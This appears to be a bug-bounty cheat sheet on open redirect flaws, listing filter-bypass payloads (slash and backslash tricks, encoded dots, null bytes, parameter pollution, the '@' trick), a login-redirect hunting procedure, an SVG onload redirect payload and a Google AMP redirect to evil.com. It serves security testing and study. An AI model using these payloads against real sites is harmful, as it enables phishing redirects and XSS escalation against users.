Open Redirect
Often a bug that brings impact when chained.
Using “https:” to bypass “//” blacklisted keyword
https:google.com
Using “//” to bypass “http” blacklisted keyword
//google.com
Using /\/
to bypass //
blacklisted keyword
\/\/google.com/
/\/google.com/
Using “/" to bypass:
/\google.com
Using “%E3%80%82” to bypass “.” blacklisted character
//google%E3%80%82com
Using null byte “%00” to bypass blacklist filter
//google%00.com
Using parameter pollution
?next=whitelisted.com&next=google.com
Using “@” character, browser will redirect to anything after the “@”
http://[email protected]/
Helpdesk trick
Sometimes a website will redirect only to a helpdesk subdomain, this behavior is interesting because it is possible to create a custom subdomain a place a script that will redirect to an evil website. Making it a open redirect.
Open Redirect farming
- If the Applictaion have a user Sign-In/Sign-Up feature, then register a user and log in as the user.
- Go to your user profile page , for example : samplesite.me/accounts/profile
- Copy the profile page’s URL
- Logout and Clear all the cookies and go to the homepage of the site.
- Paste the Copied Profile URL on the address bar
- If the site prompts for a login , check the address bar , you may find the login page with a redirect parameter like the following
- Exploit it or escalate to XSS
Open Redirect uploading svg files
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.REMOVETHISlocation='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>
Known Redirects
https://google.com/amp/s/evil.com